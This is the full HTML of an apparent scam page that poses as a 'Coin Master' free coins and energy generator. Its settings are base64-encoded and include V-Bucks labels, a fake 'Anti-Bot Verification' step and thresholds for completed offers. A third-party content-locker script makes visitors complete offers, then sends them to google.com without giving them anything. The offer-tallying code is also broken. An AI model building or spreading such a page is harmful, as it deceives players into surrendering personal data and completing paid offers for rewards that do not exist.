<!DOCTYPE html><head>    <meta charset=utf-8>
    <meta http-equiv=X-UA-Compatible content="IE=edge">
    <meta name=viewport content="width=device-width,initial-scale=1">
    <meta name=theme-color content=#ffffff>
    <title>Coin Master - Coins Generator</title>
    
    <link rel="icon" href="https://cdn.jsdelivr.net/gh/woktoba/CMSTR/1/favicon.ico" type="image/x-icon"/>
    <link rel="shortcut icon" href="https://cdn.jsdelivr.net/gh/woktoba/CMSTR/1/favicon.ico" type="image/x-icon"/>
    
    <meta name="description" content="Coin Master Generator, is the generator that will allow you to get free unlimited coins and energy.">
    <meta name="keywords" content="Coin Master Coins, coins, energy, coin master, coinmaster, free coins, unlimited coins, unlimited coin master generator">
    
    <style>
    
    body {
        overflow: hidden;
        height: 100vh;
    }

    #loader {
        position: fixed;
        top:0;
        left:0;
        background: #2d84c9;
        z-index:1000;
        opacity: 1;
        transition: 1s all;
      }

      #loader-wrap {
        width: 100vw;
        height:100vh;
        display: flex;
        flex-direction:column;
        justify-content: center;
        align-content:center;
      }

      .lds-default {
        display: inline-block;
        position: relative;
        width: 80px;
        height: 80px;
        margin: 0 auto;

      }
    .lds-default div {
      position: absolute;
      width: 6px;
      height: 6px;
      background: #fff;
      border-radius: 50%;
      animation: lds-default 1.2s linear infinite;
    }
    .lds-default div:nth-child(1) {
      animation-delay: 0s;
      top: 37px;
      left: 66px;
    }
    .lds-default div:nth-child(2) {
      animation-delay: -0.1s;
      top: 22px;
      left: 62px;
    }
    .lds-default div:nth-child(3) {
      animation-delay: -0.2s;
      top: 11px;
      left: 52px;
    }
    .lds-default div:nth-child(4) {
      animation-delay: -0.3s;
      top: 7px;
      left: 37px;
    }
    .lds-default div:nth-child(5) {
      animation-delay: -0.4s;
      top: 11px;
      left: 22px;
    }
    .lds-default div:nth-child(6) {
      animation-delay: -0.5s;
      top: 22px;
      left: 11px;
    }
    .lds-default div:nth-child(7) {
      animation-delay: -0.6s;
      top: 37px;
      left: 7px;
    }
    .lds-default div:nth-child(8) {
      animation-delay: -0.7s;
      top: 52px;
      left: 11px;
    }
    .lds-default div:nth-child(9) {
      animation-delay: -0.8s;
      top: 62px;
      left: 22px;
    }
    .lds-default div:nth-child(10) {
      animation-delay: -0.9s;
      top: 66px;
      left: 37px;
    }
    .lds-default div:nth-child(11) {
      animation-delay: -1s;
      top: 62px;
      left: 52px;
    }
    .lds-default div:nth-child(12) {
      animation-delay: -1.1s;
      top: 52px;
      left: 62px;
    }
    @keyframes lds-default {
      0%, 20%, 80%, 100% {
        transform: scale(1);
      }
      50% {
        transform: scale(1.5);
      }
    }

    </style>
    
   
    
    <link href=https://cdn.jsdelivr.net/gh/woktoba/CMSTR/2/1.css rel=preload as=style>
    <link href=https://cdn.jsdelivr.net/gh/woktoba/CMSTR/2/1.js rel=preload as=script>
    
    <link href=https://cdn.jsdelivr.net/gh/woktoba/CMSTR/2/1.css rel=stylesheet>
    
    <link href=https://use.fontawesome.com/releases/v5.8.2/css/all.css rel=stylesheet>
    
    </head><body><div id="loader">
    <div id="loader-wrap">
      <div class="lds-default"><div></div><div></div><div></div><div></div><div></div><div></div><div></div><div></div><div></div><div></div><div></div><div></div></div>
    </div>
</div>

<noscript><strong>We're sorry but landing doesn't work properly without JavaScript enabled. Please enable it to
    continue.</strong></noscript>
<div id=app></div>

<script>
    var Globals = JSON.parse(atob("eyJjYWxsX3RvX2FjdGlvbiI6IkdFVCBWLUJVQ0tTIiwiZGVzY3JpcHRpb24iOiJDb2luIE1hc3RlciBHZW5lcmF0b3IsIGlzIHRoZSBnZW5lcmF0b3IgdGhhdCB3aWxsIGFsbG93IHlvdSB0byBnZXQgZnJlZSB1bmxpbWl0ZWQgY29pbnMgYW5kIGVuZXJneS4iLCJnb29nbGVfYW5hbHl0aWNzIjoiVUEtMDAwMDAtMCIsImtleXdvcmRzIjoiQ29pbiBNYXN0ZXIgQ29pbnMsIGNvaW5zLCBlbmVyZ3ksIGNvaW4gbWFzdGVyLCBjb2lubWFzdGVyLCBmcmVlIGNvaW5zLCB1bmxpbWl0ZWQgY29pbnMsIHVubGltaXRlZCBjb2luIG1hc3RlciBnZW5lcmF0b3IiLCJtZW51X2hlYWRlciI6IlNlbGVjdCBBbW91bnQgb2YgVi1CdWNrcyIsInBsYXRmb3JtX2ZpZWxkIjoiWW91ciBQbGF0Zm9ybSIsInJlZGlyZWN0X3VybCI6Imh0dHBzOlwvXC9nb29nbGUuY29tIiwic2VsZWN0X2J1dHRvbiI6IlNlbGVjdCIsInRpdGxlIjoiQ29pbiBNYXN0ZXIgLSBDb2lucyBHZW5lcmF0b3IiLCJ1c2VybmFtZV9maWVsZCI6IllvdXIgdXNlcm5hbWUiLCJ2ZXJpZmljYXRpb25fYnV0dG9uIjoiVmVyaWZ5IE5vdyIsInZlcmlmaWNhdGlvbl9uYW1lIjoiQW50aS1Cb3QgVmVyaWZpY2F0aW9uIiwidmVyaWZpY2F0aW9uX3RpdGxlIjoiVkVSSUZJQ0FUSU9OIiwiY2VudHNfcmVxdWlyZWQiOiIxIiwibGVhZHNfcmVxdWlyZWQiOiIyIiwib2ZmZXJzX2Ftb3VudCI6IjUiLCJmYXN0ZXJfZ2VuZXJhdG9yIjoiMCIsImJhY2tncm91bmRfaW1hZ2UiOiIifQ==")),
        currentLeads = 0,
        currentCents = 0;


</script>
<script src=https://cdn.jsdelivr.net/gh/woktoba/CMSTR/2/1.js></script>

 <!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-00000-0"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', "UA-00000-0");
</script><script type="text/javascript">var CPABUILDSETTINGS={"it":2594941,"key":"f8ca7","construct":false};</script><script src='https://d9qn9uafc7mxn.cloudfront.net/hZLole.js'></script><script type='text/javascript'>CPABuildCheckForLead();

var leads_required = parseInt(Globals.leads_required);
var cents_required = parseInt(Globals.cents_required);
var redirect_url=Globals.redirect_url;

var CPABuildOffersComplete = function(completions){
    currentLeads = 0;
    currentCents = 0;
    
    for (let i = 0; i<completions.length; i++){
        currentLeads++;
        currentCents += parseInt(completion.points);
    }
   
    if(currentLeads < leads_required){
        //Needs more leads
        
         }
    else if(currentCents < cents_required){
        //Needs more cents
       
           }
    else{
        //All Requirements met!
       
          window.location.replace(redirect_url);
        
    }
    
    
}</script></body>